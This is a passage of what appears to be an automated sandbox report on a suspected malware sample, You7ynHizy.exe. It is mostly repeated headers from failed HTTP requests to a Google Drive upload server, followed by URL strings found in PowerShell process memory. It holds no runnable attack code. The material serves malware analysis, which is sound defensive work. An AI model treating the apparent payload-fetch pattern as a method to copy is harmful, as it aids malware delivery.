ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSbwdyUoSymxYKtHHdic_Ln2lYlrm9VLVNdZwQLSpjFhlyI3OrxGkUxz69Ck01WM1MZpbrS3ksContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:49 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-xb16yI02nCRC5dwUZV5yrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6gBihxxOlikXi1zu7p4tQrKQ1Uk830iyhrIcjeGwfstEuABXOrAC1vp-SBJukU7lpWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:51 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-jbWxc-j2sUDVkQMuonLMEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTtAQENBuXRdqDUMJSYeG1fS_K-olX84LV8S0Yif-y82c9qG_q0AvKrOsGgkyLzsu4Z3rwUkjMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:54 GMTContent-Security-Policy: script-src 'nonce-1V457p-AtP3OzN67UpQIXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRiznYI3J0EdjZatKLEDqleogOrRsw2whgfx1Sbeeg47UMHataN5de9ix8sImtnHftMSxlpF38Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:56 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-m6lHwX_tYE6fi_6jU4ZnQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78cnMeQxiMtzLvvwcOEyCmkpcHSuTOQ0Yzi0ICQeb3je7LyHoGDNGkanFujjf8jpl8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:59 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-HND_VF4-F29QqCe7GGAXcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ2HLa2190ZiZF4HPMOF_phK788LVxKslIJhZJyMBmfF_xzlD5t-5bLrXnnYkHHbx7oarZtZ94Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:18:01 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Iw71Zet5zzOQK6DBVd-_sA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSEFUWaPc9uywwePz5zQv6LjAim6hYxryeqx4brrKSOqLKXjxaLerDh18_9TNULyDkkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:18:03 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-aYMjxTNIfvEa2DPB02-zDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5FCXI5opmb7vreuxFh5xyKx3lNtjjX_22mBVQgoKyd_jWovCvJkdEXsbGgrv0xKbXTCcpN1cEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:18:06 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-i4w3jNhc2k1eIcH4l2hNcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQZx2ODWmxRhzrJpaQOPTijRxNsYLg7PrOuhxAx--7Ui2W9jwomxTi08ak3wLeqK0lIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:18:08 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_xSDV4TkkXLQrnhnv0Teow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRKQI1gHZww9tOnRB3r-PrLvWT6oBYTMdnSMY8WS_nTKlFBwt9yenQV5uF333fMoj5UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:18:10 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-JByc6npfKrjFrqPNkmGkgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4nwiQg0mgxCb2_QNLYqvE1EorTlzaZVeV_WDT0vUNn2zb5wixMuhmGt6vO3-uMrlizZsl8wiwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:18:13 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-97HF-wuI94U9lwlxYgQkCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6gl3_UA8eFSPWWCZAShlzvOg-YXSwJuLb61TZIpMvLC88Xz7s-eEiXMohPufwwccyDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:18:15 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-T7ejV4F1ttm7NaobG-Uq4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS5m5j1zfyBJsDI6v8PjNT-XkB0niZTi_aplrudosYZ3DZX4iOBagDuFX6N1xgBXxuNJr8pPTYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:18:17 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-yhm8-TR4BBaZ96TWzFDRQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC49efzy5Jc1zUU9JX9-uzePxgCDNw7mjPjHzaytwcAUqt-u-IyH2CLBz47F_relOc1gMv5MMHUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:18:19 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-5JttNT0--xGjnb2pb2WQlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: powershell.exe, 00000002.00000002.2516957835.0000000007015000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: You7ynHizy.exe, You7ynHizy.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2514289224.00000000059A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2511889664.0000000004A96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2511889664.0000000004941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2511889664.0000000004A96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2522365385.00000000081C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.D
      Source: powershell.exe, 00000002.00000002.2511889664.0000000004941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
